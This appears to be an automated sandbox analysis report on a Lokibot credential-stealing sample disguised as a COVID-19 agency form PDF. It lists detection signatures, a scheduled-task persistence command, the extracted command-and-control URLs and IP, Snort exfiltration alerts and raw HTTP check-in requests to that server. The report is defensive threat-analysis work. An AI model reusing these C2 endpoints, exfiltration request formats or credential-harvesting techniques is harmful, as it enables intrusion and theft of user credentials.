Loading ...

Play interactive tourEdit tour

Windows Analysis Report RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe

Overview

General Information

Sample Name:RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Analysis ID:442954
MD5:ea646520496fd4603aaf0f5778231f0d
SHA1:5112f3f6ae6a8a7cfac8364433128228c450f203
SHA256:a130cf9df18f1ae304826c98d4e7cfd2e75043b126a1df0c0a36f98a64cde5c2
Tags:exelokibot
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe (PID: 5708 cmdline: 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe' MD5: EA646520496FD4603AAF0F5778231F0D)
    • schtasks.exe (PID: 5504 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x6ffe7:$des3: 68 03 66 00 00
        • 0x743e4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x744b0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                • 0x12fff:$des3: 68 03 66 00 00
                • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                Click to see the 15 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Suspicious Double ExtensionShow sources
                Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CommandLine: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CommandLine|base64offset|contains: HR, Image: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, NewProcessName: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, OriginalFileName: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe' , ParentImage: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ProcessId: 3704

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}
                Multi AV Scanner detection for domain / URLShow sources
                Source: http://63.141.228.141/32.php/fn1ToJTMzu3TdVirustotal: Detection: 11%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\qvDFOnW.exeVirustotal: Detection: 34%Perma Link
                Source: C:\Users\user\AppData\Roaming\qvDFOnW.exeReversingLabs: Detection: 19%
                Multi AV Scanner detection for submitted fileShow sources
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeVirustotal: Detection: 34%Perma Link
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeReversingLabs: Detection: 19%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\qvDFOnW.exeJoe Sandbox ML: detected
                Machine Learning detection for sampleShow sources
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeJoe Sandbox ML: detected
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,6_2_00403D74

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49721 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49721 -> 63.141.228.141:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://63.141.228.141/32.php/fn1ToJTMzu3Td
                Source: Joe Sandbox ViewIP Address: 63.141.228.141 63.141.228.141
                Source: Joe Sandbox ViewASN Name: NOCIXUS NOCIXUS
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00404ED4 recv,6_2_00404ED4
                Source: unknownHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Jul 2021 12:36:31 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmpString found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmpString found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td?qM
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221764921.0000000000F67000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com8
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.combi
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comrsP
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.coms
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmpString found in binary or memory: https://apple.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
